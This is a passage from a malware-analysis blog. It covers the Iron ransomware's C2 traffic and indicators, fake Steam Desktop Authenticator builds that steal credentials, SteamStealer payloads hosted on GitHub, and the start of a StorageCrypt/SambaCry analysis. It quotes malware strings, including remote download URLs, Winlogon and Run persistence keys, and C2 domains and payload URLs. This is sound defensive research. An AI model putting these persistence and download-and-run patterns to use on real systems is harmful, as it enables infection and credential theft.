.wpd, .wpl, .wps, .wtd, .wtf, .x3f, .xla, .xlam, .xlc, .xlk, .xll, .xlm, .xlr, .xlsb, .xltx, .xlv, .xlwx, .xpi, .xpt, .yab, .yps, .z02, .z04, .zap, .zipx, .zoo, .ztmp</i></blockquote>
<div>
<br /></div>
<div>
Iron doesn't spare gamers, as it will also encrypt Steam files (.vdf), World of Tanks replays (.wotreplay). DayZ (.DayZProfile), and possibly others.</div>
<div>
<br /></div>
<div>
Folders containing the following words are exempt from encryption:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>Windows, windows, Microsoft, Mozilla Firefox, Opera, Internet Explorer, Temp, Local, LocalLow, $Recycle.bin, boot, i386, st_v2, intel, recycle, 360rec, 360sec, 360sand, internet explorer, msbuild</i></blockquote>
<br />
Interestingly enough, <i>360sec</i>, <i>360rec</i>, and <i>360sand</i> is developed by Qihoo 360, an internet security company based in China, and is an antivirus (360 Total Security is one example). This, as well as the fact that the Iron ransomware also includes resources in Chinese Simplified, alludes this variant may be developed by a Chinese speaker.<br />
<br />
The ransomware will additionally delete the original files after encryption, and will also empty the recycle bin. It does <b>not</b> remove Shadow Volume Copies or Restore Points.<br />
<br />
Iron embeds a public RSA key as follows:<br />
<br />
<blockquote>
<i>-----BEGIN RSA PUBLIC KEY-----<br />MIGJAoGBAIOYf0KqEOGaxdLmMLypMyZ1q/K+r6DuCdYpwZfs0EPug3ye7UjZa0QMOP5/OySr<br />l/uBJtkmEghEtUEo/zfcBJ7332O1ytJ7/ebIUv+ZcN1Rlswzdv7uZxYRC8u1HvrgBvAz4Atb<br />zx+FbFVqLB0gGixYTqbjqANq21AR6r91+oJtAgMBAAE=<br />-----END RSA PUBLIC KEY-----</i></blockquote>
<br />
The Iron ransomware will determine the user's WAN IP and also send a POST request to its C2 server, <b>http://y5mogzal2w25p6bn[.]ml</b>.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-5nd9bNYrlmU/Ws0GJ4iQBnI/AAAAAAAAB_s/KS0PzRk8oVUjKVqqpUAr1cjjbz-_2CRNQCLcBGAs/s1600/traffic.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="472" data-original-width="1244" height="151" src="https://4.bp.blogspot.com/-5nd9bNYrlmU/Ws0GJ4iQBnI/AAAAAAAAB_s/KS0PzRk8oVUjKVqqpUAr1cjjbz-_2CRNQCLcBGAs/s400/traffic.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 8 - Traffic<br />
<br /></td></tr>
</tbody></table>
</div>
<div>
It appears Iron will create a new, random GUID, and use it as a mutex, in order to not infect the machine twice. The following values will be sent to the C2:</div>
<div>
<br /></div>
<div>
<ul>
<li>Encryption key;</li>
<li>Randk (seed);</li>
<li>GUID (mutex);</li>
<li>Start (whether ransom successfully started);</li>
<li>Market (unknown).</li>
</ul>
<div>
The C2 server will then respond with another set of values, and generate a <i>unique </i>Bitcoin address, which means that victims may pay twice to different addresses. Rule of thumb: do <b>not </b>pay the ransomware.</div>
</div>
<div>
<br /></div>
<div>
Of note is an email address in the response: <i>oldblackjack@outlook.com</i>.</div>
<div>
<br /></div>
<div>
Iron will additionally save certain values, such as the GUID, in <i>HKCU\Software\CryptoA:</i></div>
<div>
<i><br /></i></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-A0nhF6epUTM/Ws0Ll1Wa7GI/AAAAAAAAB_8/GU-KDREGxzkcouM_xCTynrpgEJxyPIZIQCLcBGAs/s1600/Regkey.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="144" data-original-width="1119" height="51" src="https://4.bp.blogspot.com/-A0nhF6epUTM/Ws0Ll1Wa7GI/AAAAAAAAB_8/GU-KDREGxzkcouM_xCTynrpgEJxyPIZIQCLcBGAs/s400/Regkey.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 9 - Registry values (click to enhance)</td></tr>
</tbody></table>
<br />
Encrypted files will have the <b>.encry </b>extension appended. It is likely not possible to restore data.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b><br />
<div>
<i><br /></i></div>
<div>
It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example.<br />
<br />
We know the Iron ransomware has mimicked at least three ransomware families:<br />
<ul>
<li><b>Maktub</b> (payment portal design)</li>
<li><b>DMA Locker </b>(Iron Unlocker, decryption tool)</li>
<li><b>Satan</b> (exclusion list)</li>
</ul>
<div>
From the screenshots above, it is obvious the portal design has been copy pasted from Maktub.</div>
<div>
<br /></div>
<div>
As for copying from DMA Locker, see this tweet:</div>
<div>
<blockquote class="twitter-tweet" data-conversation="none" data-lang="en">
<div dir="ltr" lang="en">
and BTW, their unlocker looks like they copied layout from DMA Locker (<a href="https://t.co/FFWzMpQ6hu">https://t.co/FFWzMpQ6hu</a>) <a href="https://t.co/HWZXGtc2i7">pic.twitter.com/HWZXGtc2i7</a></div>
— hasherezade (@hasherezade) <a href="https://twitter.com/hasherezade/status/983885077829640192?ref_src=twsrc%5Etfw">April 11, 2018</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
</div>
<div>
<br />
And, last but not least, it uses the exact same exclusion list (folders and its content that will <i>not</i> be encrypted) from Satan:<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
Just to clarify, there isn't specific code overlap, as the crypto is quite different to Satan. However, there are similarities in a number of things, such as the exclusion list. <a href="https://t.co/OHkFimJ3g7">https://t.co/OHkFimJ3g7</a> <a href="https://t.co/ub6hOnucgn">pic.twitter.com/ub6hOnucgn</a></div>
— Bart (@bartblaze) <a href="https://twitter.com/bartblaze/status/984173690035363840?ref_src=twsrc%5Etfw">April 11, 2018</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
</div>
</div>
<div>
Code is indeed quite unique, and Iron seems like a totally new ransomware, and may even be a "side project" by the creators of the Satan ransomware. However, at this point, there is no sure way of telling who's behind Iron. Time may be able to tell.<br />
<br />
<b>Decryption </b>is impossible without the author's private key, however, it is possible to restore files using Shadow Volume Copies, or alternatively <a href="https://www.shadowexplorer.com/" target="_blank">Shadow Explorer</a>. If that doesn't work, you may try using a data recovery program such as <a href="http://www.cgsecurity.org/wiki/PhotoRec" target="_blank">PhotoRec</a> or <a href="https://www.piriform.com/recuva" target="_blank">Recuva</a>.<br />
<br /></div>
<div>
Take note of <a href="https://id-ransomware.malwarehunterteam.com/" target="_blank">ID ransomware</a>, if a decryptor should ever become available. Additionally, it may identify other families of ransomware if you are ever affected. Another service to take note of in this regard is <a href="https://www.nomoreransom.org/" target="_blank">NoMoreRansom</a>.</div>
<div>
<br /></div>
<div>
For preventing ransomware, have a look here:</div>
<div>
<a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">Ransomware Prevention</a></div>
<div>
<br /></div>
<div>
In short: <b>create backups</b>!<br />
<br />
Questions, comments, feedback or help: leave a comment below or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<b>Indicators</b>:<br />
<br /></div>
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #104E8B;
color: #FFF;
font-weight: bold;
}
</style>
<table class="tableizer-table">
<thead><tr class="tableizer-firstrow"><th>Indicator type</th><th>Indicator</th></tr></thead><tbody>
<tr><td>email</td><td>oldblackjack@outlook.com</td></tr>
<tr><td>domain</td><td>y5mogzal2w25p6bn.ml</td></tr>
<tr><td>FileHash-SHA256</td><td>19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770</td></tr>
<tr><td>URL</td><td>http://y5mogzal2w25p6bn.ml</td></tr>
<tr><td>URL</td><td>http://y5mogzal2w25p6bn.ml/receive</td></tr>
<tr><td>FileHash-MD5</td><td>1e60050db59e3d977d2a928fff3d34a6</td></tr>
<tr><td>FileHash-SHA1</td><td>f51bab89b4e4510b973df8affc2d11a4476bd5be</td></tr>
<tr><td>email</td><td>recoverfile@mail2tor.com</td></tr>
</tbody></table>
</div>
On AlienVault:
<script src="https://otx.alienvault.com/pulse/5acd10efc709df54564b6a4c.js"></script>
<br />
<div>
<i><br /></i></div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com2tag:blogger.com,1999:blog-606282676955748155.post-9902840176933221122018-02-25T23:44:00.001+01:002018-02-26T09:53:09.973+01:00Fake Steam Desktop Authenticator steals account details<br />
In this blog post, we'll have a quick look at fake versions of Steam Desktop Authenticator (SDA), which is a "desktop implementation of Steam's mobile authenticator app".<br />
<br />
<a href="https://steamrep.com/profiles/76561198052640461" target="_blank">Lava</a> from <a href="https://steamrep.com/" target="_blank">SteamRep</a> brought me to the attention of a fake version of SDA floating around, which may be attempting to steal your Steam credentials.<br />
<br />
Indeed, there are some fake versions - we'll discuss two of them briefly.<br />
<br />
<br />
<b><span style="font-size: large;">Fake version #1</span></b><br />
<br />
The first fake version can be found on steamdesktopauthenticator[.]com. Note that the site is live, and appears at the top of Google Search when searching for "Steam Desktop Authenticator".<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-DcNTiNR097o/WpH1N3-_ZOI/AAAAAAAAB9Q/Fe8ZfA-1qi4GXSIdsMgJgarfxDRagKmMACLcBGAs/s1600/SDA.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="450" data-original-width="815" height="176" src="https://4.bp.blogspot.com/-DcNTiNR097o/WpH1N3-_ZOI/AAAAAAAAB9Q/Fe8ZfA-1qi4GXSIdsMgJgarfxDRagKmMACLcBGAs/s320/SDA.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Fake SDA website</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
When downloading the ZIP file from the website, and unzipping it, we notice the exact same structure as you would when fetching the legitimate package - with one difference: the main executable has been modified.<br />
<br />
File details:<br />
<b>Name</b>: Steam Desktop Authenticator.exe<br />
<b>MD5 hash</b>: 872abdc5cf5063098c87d30a8fcd8414<br />
<b>File size</b>: 1,4446 KB<br />
<b>Version</b>: v1.0.9.1<br />
<br />
Note that the current and real SDA version is 1.0.8.1, and its original file size is 1,444 KB - 2 bytes of difference can mean a lot. Figures 2 and 3 below show the differences.<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-ErdtcFk1sL4/WpM1NA85fCI/AAAAAAAAB9g/Z6OLNL48JN4pVQPzN1J0TiDLsBHsxfi9gCLcBGAs/s1600/SDA-2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="661" data-original-width="1022" height="257" src="https://4.bp.blogspot.com/-ErdtcFk1sL4/WpM1NA85fCI/AAAAAAAAB9g/Z6OLNL48JN4pVQPzN1J0TiDLsBHsxfi9gCLcBGAs/s400/SDA-2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Sending credentials to steamdesktopauthenticator[.]com</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoKufsC4T5m5w2c6qDanTp5g9wn_kvWSEG5eLe4mT5tVWGXwPkv8PBHJ6AGTEf1H4XoSR1A-dlPLSQ97EkVHU22b2QnO4mdZkLFN2Mdl_BtgsT5c0tCSBLm3x93OqolHsflRRAfkiihXH/s1600/SDA-3.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="633" data-original-width="738" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoKufsC4T5m5w2c6qDanTp5g9wn_kvWSEG5eLe4mT5tVWGXwPkv8PBHJ6AGTEf1H4XoSR1A-dlPLSQ97EkVHU22b2QnO4mdZkLFN2Mdl_BtgsT5c0tCSBLm3x93OqolHsflRRAfkiihXH/s400/SDA-3.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Sending credentials to steamdesktop[.]com</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Indeed, it appears it also attempts to upload to another website - while digging a bit further, we can also observe an email address associated with the domains: <i>mark.korolev.1990@bk[.]ru</i><br />
<br />
While I was unable to immediately find a malicious fork with any of these domains, <i>Mark</i> has likely forked the original repository, made the changes - then deleted the fork. Another possibility is that the source was downloaded, and simply modified. However, it is more than likely the former option.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Fake version #2</span></b><br />
<br />
This fake version was discovered while attempting to locate <i>Mark</i>'s fork from the fake version above - here, we have indeed a malicious fork from GitHub, where trades/market actions appear to be intercepted, as shown in Figure 4 below.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-6GlL7SuQsag/WpM4Drtso7I/AAAAAAAAB90/BeAEou8nL84mVdh5v7uCn8NW4LXYZD0YQCLcBGAs/s1600/SDA-4.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="595" data-original-width="1581" height="150" src="https://2.bp.blogspot.com/-6GlL7SuQsag/WpM4Drtso7I/AAAAAAAAB90/BeAEou8nL84mVdh5v7uCn8NW4LXYZD0YQCLcBGAs/s400/SDA-4.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Malicious SDA fork (click to enhance)</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Currently, when trying to access the malicious site lightalex[.]ru with a bogus token, a simple "OK" is returned - it is currently unknown whether market modifications would be successful.<br />
<br />
Interestingly enough, when digging deeper on this particular domain, which is currently hosted on 91.227.16[.]31, it had hosted other SteamStealer malware before, for example cs-strike[.]ru and csgo-knives[.]net.<br />
<br />
The malicious fork has been reported to GitHub.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Disinfection</span></b><br />
<br />
Neither fake SDA versions reported here appear to implement any persistence, in other words; remove the fake version by deleting it, and perform a scan with your current antivirus and a scan with another, online antivirus, or with <a href="https://www.malwarebytes.com/" target="_blank">Malwarebytes</a> for example.<br />
<br />
Additionally, de-authorize all other devices by clicking <a href="https://store.steampowered.com/twofactor/manage" target="_blank">here</a> and select "Deauthorize all other devices".<br />
<br />
Now, change your password for Steam, and enable <a href="https://support.steampowered.com/kb_article.php?ref=1266-OAFV-8478#steamguard" target="_blank">Steam Guard</a> if you have not yet done so.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
Prevention advise is the usual, extended advise is provided in a previous blog post <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html#prevention" target="_blank">here</a>.<br />
<br />
You may also want to take a look at SteamRep's Safe Trading Practices <a href="https://forums.steamrep.com/pages/safetrading/" target="_blank">here</a>.<br />
<br />
Always download any software from the original source - this means the vendor's website, or in this case, the <b>official SDA repository on GitHub</b>:<br />
<a href="https://github.com/Jessecar96/SteamDesktopAuthenticator">https://github.com/Jessecar96/SteamDesktopAuthenticator</a><br />
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
SteamStealer malware is alive and well, as seen from my <a href="https://bartblaze.blogspot.co.uk/2018/01/quickpost-steamstealers-via-github.html" target="_blank">January blog post</a>. This is again another form of attempting to scam users, and variations will continue to emerge.<br />
<br />
Follow the prevention tips above or <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html#prevention" target="_blank">here</a> to stay safe.<br />
<br />
<br />
<b>Indicators</b><br />
<br />
<script src="https://otx.alienvault.com/pulse/5a933d099e7d6c6780e3b570.js"></script>
<br />Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com1tag:blogger.com,1999:blog-606282676955748155.post-33325617166363965262018-02-08T21:31:00.002+01:002024-02-26T19:31:06.392+01:00Malware Analysis, Threat Intelligence and Reverse Engineering: workshop slides<br />
Last month I gave a workshop for a group of 20-25 enthusiastic women, all either starting in infosec, or with an interest to start in this field.<br />
<br />
The event, now obviously expired, can be found here:<br />
<a href="https://www.eventbrite.com/e/cwf-women-in-cyber-event-1-malware-fundamentals-tickets-41239913692#" target="_blank">CWF Women in Cyber Event #1: Malware Fundamentals</a><br />
<br />
For that purpose, I had created a full workshop: slides or a presentation introducing the concepts of Malware Analysis, Threat Intelligence and Reverse Engineering.<br />
<br />
The idea was to convey these topics in a clear and <i>approachable </i>manner, both theory and in practice; for the latter, I had set up a custom VM, with Labs, including my own created applications, some with simple obfuscation.<br />
<br />
All participants were very enthusiastic, and I hope to have sparkled most, if not some of them to pursue a career in this field. For this exact same reason, I am now releasing the presentation to the public - the VM and recordings however will not be published, as I created these solely for CWF.<br />
<br />
You may however download the LAB material from Github below:<br />
<a href="https://github.com/bartblaze/MaTiRe">https://github.com/bartblaze/MaTiRe</a><br />
<br />
Without any further ado, you may find the slides below, on either SlideShare or SpeakerDeck:<br />
<br />
<i>SlideShare</i><br />
<br />
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/eTJDZt2i7G2B6U" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/bartblaze/malware-analysis-threat-intelligence-and-reverse-engineering" target="_blank" title="Malware analysis, threat intelligence and reverse engineering">Malware analysis, threat intelligence and reverse engineering</a> </strong> from <strong><a href="https://www.slideshare.net/bartblaze" target="_blank">bartblaze</a></strong> </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<i>SpeakerDeck</i><br />
<i><br /></i>
<script async="" class="speakerdeck-embed" data-id="f423fc8e44054085ba4d3a6b7ab8ac9c" data-ratio="1.77777777777778" src="//speakerdeck.com/assets/embed.js"></script>
<br />
<br />
<br />
Any feedback is always appreciated.<br />
<br />
I would also like to thank <a href="https://twitter.com/eilah_tan" target="_blank">Nathalie</a> for putting me in touch with <a href="https://twitter.com/rosannakurrer" target="_blank">Rosanna</a>, the organiser of the <a href="https://twitter.com/CyberWayFinder" target="_blank">CyberWayFinder</a> program. And of course, my gratitude to all the attendees for making it!<br />
<br />
<i>Mind the disclaimer for the slides. License: CC Attribution-NonCommercial-NoDerivs License</i>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com5tag:blogger.com,1999:blog-606282676955748155.post-66028639689651802432018-01-24T22:26:00.000+01:002020-06-24T19:18:09.612+02:00Quickpost: SteamStealers via Github<br />
Back in 2014, I created a blog post named 'Malware spreading via Steam chat', where I analysed and discussed one of the first 'SteamStealers' - malware that is exclusively targeting gamers, or at least those who use Steam.<br />
<br />
You can read that blog post <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html" target="_blank">here</a>. Another SteamStealer technique was via a <a href="https://bartblaze.blogspot.co.uk/2016/01/chrome-extension-empties-your-steam.html" target="_blank">Chrome extension</a>, and there are many others reported as well - if you fancy a read, check out a blog post and paper I co-authored with Santiago <a href="https://securelist.com/all-your-creds-are-belong-to-us/74137/" target="_blank">here</a>.<br />
<br />
This blog is meant as a quick post and heads-up, as some cybercriminals who use SteamStealer, are now also resorting to using Github. I was notified of this by Malwarehunterteam on Twitter:<br />
<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
Also, anyone seen before a malware which replaces Steam trade links?<br />
cc <a href="https://twitter.com/bartblaze?ref_src=twsrc%5Etfw">@bartblaze</a> <a href="https://twitter.com/spontiroli?ref_src=twsrc%5Etfw">@spontiroli</a> <a href="https://t.co/XFcVQKy4On">pic.twitter.com/XFcVQKy4On</a></div>
— MalwareHunterTeam (@malwrhunterteam) <a href="https://twitter.com/malwrhunterteam/status/951803848192090114?ref_src=twsrc%5Etfw">January 12, 2018</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<br />
<br />
In this example, Evrial uses Github to copy/steal clipboard contents, and replaces Steam trade offer links. Note that Evrial is a full-blown infostealer.<br />
<br />
<br />
Another recent example, given to me by <i>advicebanana</i>, is a SteamStealer for the sole purpose of stealing your Steam credentials. In this specific case, the malware was redirected from:<br />
<i>http://screenpicture[.]pro/image293[.]jpg </i>to the following page or Gist, hosted on Github:<br />
<i>https://raw.githubusercontent[.]com/Hamlo22888/Sur/master/image293[.]scr</i><br />
<br />
While the gist is already offline at time of posting, it's possible some Steam users may have been tricked into downloaded and executing the file.<br />
<br />
Interesting to note that the debug path in this specific sample is:<br />
<blockquote class="tr_bq">
<i>D:\asd\php\steam_complex\New_steal\new_steal_no_proxy\14ver -original(pubg+??????????)\SteamStealer\obj\Release\vv.pdb</i></blockquote>
While in my original blog post, from 2014, it was as follows:<br />
<br />
<blockquote class="tr_bq">
<i>d:\asd\????????_new\??#\add\SteamComplex\SteamStealer\?????????? ?????????? (18)\SteamStealer\obj\Release\vv.pdb</i></blockquote>
<br />
It appears the original SteamStealer developer is still going strong.<br />
<br />
For preventing getting scammed or ending up with a SteamStealer on your machine, follow the prevention tips in <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html" target="_blank">this</a> blog post.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
SteamStealers are (again) alive and well. While there was a drop observed at some point, due to the enormous amount of scamming websites, it appears the SteamStealer <i>malware</i> is back in business.<br />
<br />
Github is also getting more popular among cybercriminals - often whitelisted in organisations, it offers yet again another method of hosting malware.<br />
<br />
As mentioned before, follow the prevention tips in my earlier blog post to stay safe.<br />
<br />
<br />
<b>Indicators</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/5a68fb2f6ed6947c069e1409.js"></script>
<b><br /></b>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-78096408356474041062017-12-06T22:49:00.003+01:002017-12-06T23:09:49.931+01:00StorageCrypt ransomware, a coinminer and more<br />
<br />
Lawrence over at Bleeping Computer posted an interesting blog yesterday:<br />
<a href="https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/" target="_blank">StorageCrypt Ransomware Infecting NAS Devices Using SambaCry</a><br />
<br />
In that blog, Lawrence pointed out quite some users had issues with a new ransomware, dubbed StorageCrypt, and possibly spread via a worm.<br />
<br />
There is a Windows component and a Linux component. We'll briefly take a look at both, hopefully providing some additional insight and indicators.<br />
<br />
<br />
<b><span style="font-size: large;">Windows </span></b><span style="font-size: large;"><b>artifacts</b></span><br />
<br />
美女与野兽.exe is the Windows component, and as pointed out by Lawrence, translates loosely to 'Beauty and the Beast'.<br />
<br />
This executable is packed with ASPack, and appears to to display worm-like and backdoor behaviour, with the additional 'feature' of spreading itself via removable drives. After unpacking the sample, it reveals some interesting strings:<br />
<br />
<blockquote class="tr_bq">
<i>1.vbp</i><i>SMSS.EXE</i><i>http://www.freewebs.com/kelly6666/sm.txt</i><i>http://www.freewebs.com/kelly6666/lo.txt</i><i>DBST32NT.LOG</i><i>.bak</i><i>.exe</i><i>V1.8</i><i>Start Success</i><i>.log</i><i>yyyymmddmmss</i><i>Txt Open ,Repair the application!</i><i> is running, Repair the application from backup.</i><i> is running, Repair the application from MySelf.</i><i> running</i><i> is running, update the application !</i><i>Get V Data!</i><i>Read Tname to memory</i><i>.ico</i><i>Kill ico</i><i>ExtractIcons...</i><i>Write to Tname...</i><i>ip addr added</i><i>GetFolderFileDate...</i><i>Replace all attrib.</i><i>I m here!--></i><i>Insert Error :</i><i> for </i><i>.dll</i><i>.dll </i><i>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</i><i>Shell</i><i>explorer.exe </i><i>Userinit</i><i>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</i><i>Windows9xPacks</i><i>HKEY_CLASSES_ROOT\txtfile\shell\open\command</i><i> NOTEPAD.EXE %1</i><i>HKEY_</i><i>HKEY_CLASSES_ROOT</i><i>HKEY_CURRENT_USER</i><i>HKEY_LOCAL_MACHINE</i><i>HKEY_USERS</i><i>HKEY_PERFORMANCE_DATA</i><i>HKEY_CURRENT_CONFIG</i><i>HKEY_DYN_DATA</i><i>Error</i><i>C:\boot_net.dat</i><i>C:\dosnal.exe</i><i>Find all exe file from Local host</i><i>*.exe</i><i>Download files is accomplish!</i><i>Run files of download is success!</i><i>[autorun]</i><i>Download files1 is accomplish!</i><i>Run files1 of download is success!</i><i>This program cannot be run in DOS mode.</i><i>This program must be run under Win32</i><i>Autorun.inf</i><i>success</i><i>.txt</i><i>cmd.exe /C net view </i><i>command.exe /C net view </i><i> to find to Create file</i><i>.exe</i><i>open=</i><i>.exe</i><i>Get Local host IP: </i><i>Rnd IP:</i><i>Disk</i><i>C:\dntboot.bin</i><i>ip packet too_big</i><i>ip unload</i></blockquote>
Whatever was hosted at www.freewebs[.]com, cannot be retrieved as it no longer exists.<br />
<br />
In any case, binaries similar as to this one, appear to have been floating the web for quite a while, as can be observed in <a href="https://totalhash.cymru.com/analysis/?b20b44586f6bdc40a929ef32a87e2df2148d32b5" target="_blank">this analysis result</a> from <b>2013</b> by Team Cymru's TotalHash.<br />
<br />
I've uploaded the unpacked sample on <a href="https://www.reverse.it/sample/9be4f45f531dab5401444761e83891b53dccdb926fdfe57643b8e53338e65d4f?environmentId=100" target="_blank">Hybrid Analysis</a>.<br />
<br />
<br />
<b><span style="font-size: large;">Linux </span></b><span style="font-size: large;"><b>artifacts</b></span><br />
<b><span style="font-size: large;"><br /></span></b>
The Linux component appears to exist out of a Samba vulnerability, dubbed SambaCry, and assigned <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7494" target="_blank">CVE-2017-7494</a> from earlier this year.<br />
<br />
There are several components, which are listed in the table below.<br />
<br />
<br />
<table border="0" cellspacing="0">
<colgroup width="85"></colgroup>
<colgroup width="240"></colgroup>
<colgroup width="146"></colgroup>
<tbody>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Filename</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Hash</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Purpose</span></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">kJn8LUAZ.so</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">6b5b4fce04f36101c04c0c5b3f7935ea </span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Downloads ‘sambacry’</span></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">ZbdofxPY.so</span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">053bb22c2cedf5aa5a089bfd2acd31f6 </span></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">Downloads ‘sambacry’</span></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><span style="font-family: "calibri";">sambacry</span></td>
